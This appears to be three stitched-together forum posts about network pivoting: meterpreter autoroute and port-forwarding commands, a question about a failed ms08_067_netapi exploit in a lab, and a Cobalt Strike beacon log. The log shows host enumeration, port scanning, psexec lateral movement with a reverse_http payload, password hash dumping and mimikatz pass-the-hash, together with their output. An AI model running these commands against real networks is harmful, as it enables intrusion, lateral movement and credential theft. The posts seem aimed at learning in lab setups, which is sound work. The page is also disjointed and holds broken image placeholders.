Help understanding pivoting and port forwading

I am trying to learn about pivoting/port forwarding and how to take full advantage of it. If I am connected to a network with the ip 192.168.0.10 and can see that 192.168.0.11 has access to a website hosted on 10.10.10.10 I am able to gain access to the webpage using meterpreter by doing:

meterpreter> run autoroute -s 10.10.10.0/24 meterpreter> run portfwd add -l 8080 -p 80 -r 192.168.0.11 

and then localhost:8080 in a web browser. From here I can use meterpreters TCP scanners to see there are other machines on the 10 network.

My question is, how can I then attempt to gain access to another machine, say brute force `10.10.10.11′ ssh port?

Also in an effort to gain a better understanding of what metesploit is doing, how could I also achieve this setup with proxychains? and would this allow me to use the kali tools on my host: 192.168.0.10 directly on the target network 10 network?

Thanks

ms08_067_netapi exploit & pivoting problem

I’m having troubles with ms08_067_netapi.

I have a private network with a web server (10.10.2.10), windows 7 (10.10.2.8) and windows XP (10.10.2.9). I’m hacking from outside the private network with kali (10.0.2.15) the web server then I make portforwarding to attack the windows 7.

The windows 7 attack is working but when I try to attack the windows XP with ms08_067_netapi exploit I can’t get access and I don’t know why.

Outside the private network the exploit works but why not inside when the pivoting is working for the windows 7?

This is my port forwarding list enter image description here

My sessions

enter image description here

And my options enter image description here

About pivoting meterpreter

[+] established link to parent beacon: 192.168.1.2

beacon> net view [*] Tasked beacon to run net view [+] host called home, sent: 76344 bytes [+] received output: List of hosts:

[+] received output: Server Name IP Address Platform Version Type Comment ———– ———- ——– ——- —- ——- HEMA1 192.168.1.5 500 6.1
HEMA2 192.168.1.6 500 6.1
HEMA3 192.168.1.13 500 6.1
HEMA5 192.168.1.2 500 6.1
WTP-PC 192.168.1.12 500 6.1

beacon> portscan 192.168.1.12 1-1024,3389,5900-6000 none 1024 [*] Tasked beacon to scan ports 1-1024,3389,5900-6000 on 192.168.1.12 [+] host called home, sent: 75325 bytes [+] received output: 192.168.1.12:139 192.168.1.12:135

[+] received output: 192.168.1.12:554 192.168.1.12:445 Scanner module is complete

beacon> psexec WTP-PC ADMIN$ http [] Tasked beacon to run windows/beacon_http/reverse_http (192.168.1.3:6666) on WTP-PC via Service Control Manager (\WTP-PC\ADMIN$ 99981.exe) [+] host called home, sent: 14985 bytes [-] could not upload file: 5 [-] Could not open service control manager on WTP-PC: 5 beacon> hashdump [] Tasked beacon to dump hashes [+] host called home, sent: 64069 bytes [+] received password hashes: Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: wtp:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

beacon> rev2self [] Tasked beacon to revert token beacon> pth HEMA5\Administrator 31d6cfe0d16ae931b73c59d7e0c089c0 [] Tasked beacon to run mimikatz’s sekurlsa::pth /user:Administrator /domain:HEMA5 /ntlm:31d6cfe0d16ae931b73c59d7e0c089c0 /run:”cmd.exe /c echo 1b932da7028 > \.\pipe\ca907f” command beacon> psexec WTP-PC ADMIN$ smb [*] Tasked beacon to run windows/beacon_smb/bind_pipe (\WTP-PC\pipe\status_7777) on WTP-PC via Service Control Manager (\WTP-PC\ADMIN$ 638e2.exe) [+] host called home, sent: 679790 bytes [+] Impersonated NT AUTHORITY\SYSTEM [-] could not upload file: 1331 [-] Could not open service control manager on WTP-PC: 5 [-] Could not connect to pipe (\WTP-PC\pipe\status_7777): 1331 [-] could not connect to pipe: 1331 [+] received output: user : Administrator domain : HEMA5 program : cmd.exe /c echo 1b932da7028 > \.\pipe\ca907f impers. : no NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0 | PID 3184 | TID 2212 | LSA Process is now R/W | LUID 0 ; 19179194 (00000000:0124a6ba) _ msv1_0 – data copy @ 001C6B0C : OK ! _ kerberos – data copy @ 001A8628 _ aes256_hmac -> null
_ aes128_hmac -> null
_ rc4_hmac_nt OK _ rc4_hmac_old OK _ rc4_md4 OK _ rc4_hmac_nt_exp OK _ rc4_hmac_old_exp OK _ *Password replace -> null